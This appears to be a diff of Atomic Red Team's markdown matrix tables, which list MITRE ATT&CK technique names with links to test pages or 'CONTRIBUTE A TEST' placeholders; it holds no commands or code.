| | | Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) | |
|
||||
| | | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Junk Code Insertion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | Power Settings [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | | | | | | | |
|
||||
| | | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | | |
|
||||
| | | Udev Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Extended Attributes [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | | SVG Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | Indicator Removal on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | [Masquerading: Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | |
|
||||
@@ -63,8 +63,10 @@
|
||||
| | | | | [Impair Defenses: Impair Command History Logging](../../T1562.003/T1562.003.md) | | | | | | | |
|
||||
| | | | | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | Delay Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | [Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md) | | | | | | | |
|
||||
| | | | | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | Browser Fingerprint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | |
|
||||
|
||||
@@ -4,55 +4,55 @@
|
||||
| External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | [Remote Services:VNC](../../T1021.005/T1021.005.md) | [Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery: Internet Connection Discovery](../../T1016.001/T1016.001.md) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Screen Capture](../../T1113/T1113.md) | Exfiltration Over Webhook [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Phishing: Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Services: SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Phishing: Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File/Path Exclusions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Phishing: Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File/Path Exclusions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Device Driver Discovery](../../T1652/T1652.md) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Publish/Subscribe Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: AppleScript](../../T1059.002/T1059.002.md) | External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal Web Session Cookie](../../T1539/T1539.md) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Obfuscated Files or Information: Encrypted/Encoded File](../../T1027.013/T1027.013.md) | Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Permission Groups Discovery: Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Stop [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Browser Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Keychain](../../T1555.001/T1555.001.md) | System Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Services: Launchctl](../../T1569.001/T1569.001.md) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | XPC Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | [Network Sniffing](../../T1040/T1040.md) | [Network Share Discovery](../../T1135/T1135.md) | | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ccache Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Protocol Tunneling](../../T1572/T1572.md) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Information Discovery](../../T1082/T1082.md) | | [Data from Local System](../../T1005/T1005.md) | Exfiltration Over Web Service: Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Network Configuration Discovery: Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bandwidth Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | [Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Unsecured Credentials](../../T1552/T1552.md) | Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Lua [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Time Based Evasion](../../T1497.003/T1497.003.md) | | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement: Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | [Subvert Trust Controls: Gatekeeper Bypass](../../T1553.001/T1553.001.md) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | IDE Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Compute Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | Virtual Machine Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Video Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | [Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md) | Break Process Trees [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
|
||||
| Wi-Fi Networks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | [Event Triggered Execution: Emond](../../T1546.014/T1546.014.md) | Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
|
||||
| | Malicious Copy and Paste [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create Account: Local Account](../../T1136.001/T1136.001.md) | Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md) | Steal or Forge Authentication Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Discovery](../../T1083/T1083.md) | | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Bombing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | IDE Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md) | [System Network Connections Discovery](../../T1049/T1049.md) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
